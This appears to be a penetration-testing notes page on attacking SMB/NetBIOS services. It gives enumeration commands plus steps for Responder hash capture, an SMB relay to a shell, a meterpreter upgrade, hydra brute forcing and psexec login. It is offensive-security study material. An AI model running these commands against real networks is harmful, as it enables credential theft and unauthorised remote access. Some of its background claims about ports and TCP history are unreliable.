Search

Pentesting Guide and Notes

Certification Reviews

Writeups

microsoft-ds (Microsoft Directory Services)

Description

Microsoft Directory Services is the newer version of NetBIOS Session Service which allows the exchange of data between two hosts using the SMB protocol.

Port 139 was used by NetBIOS before Windows 2000 since TCP wasn’t invented yet, so it uses it’s own protocol.

Nowadays, NetBIOS uses port 445 over TCP to exchange data with the SMB protocol.

netbios-ssn (NetBIOS Session Service)

Enumeration

A great first thing to do is to enumerate the available shares with smbmap. This will output all the available shares with the read/write permissions:

smbmap -u "" -p "" -H $IP

nmap also has a great set of SMB scripts which you can launch with:

nmap -p 445 --script=smb* -oX ./nmap/smb.xml $IP

If you find some shares that you can read and/or write, smbclient can be used to browse the share and retrieve files from it.

smbclient \\\\$IP\\$SHARE "$PASSWORD" -U "$USERNAME"
User/Password login
smbclient \\\\$IP\\$SHARE -N
Anonymous login

ls, cd and get will allow you to list the current directory, move to another directory and download a file respectively. help will display the available commands.

Exploitation

Capturing LM/NTML Hashes

Both LLMNR and NBT-NS are used in Windows environments as a fallback for when the resolving of a hostname via DNS fails.

After a machine resolves a host, it sends NTLMv1/v2 hashes, which can be captured by pretending to be the hostname the machine was looking for.

  1. A machine on the network asks to connect to a non-existent hostname on the network
  2. The machine broadcasts a LLMNR/NBT-NS message asking who is this hostname
  3. The attacker responds to the broadcast, pretending to be this hostname
  4. The machine sends it’s username and NTLMv1/v2 hash to the attacker
💡
For this attack to work, SMB Signing must be disabled on the machines.
python3 Responder.py -I $INTERFACE --lm

SMB Relay Attack

💡

For this attack to work, SMB Signing must be disabled on the machines. The target machine’s user must also be an administrator.

With Responder.py still running:

python3 MultiRelay.py -t $TARGET_IP -u ALL

This command should result in a shell.

To upgrade to a meterpreter shell, generate a payload with msfvenom, then upload the payload using :

upload $LOCAL_PATH_TO_PAYLOAD

Start a handler in msfconsole, then:

$LOCAL_PATH_TO_PAYLOAD

Brute Force

hydra -L $USERS_LIST -P $PASSWORDS_LIST $IP smb

Shell

If you have a username/password combination, you can use msfconsole to summon a meterpreter shell using the SMB protocol:

msfconsole
use exploit/windows/smb/psexec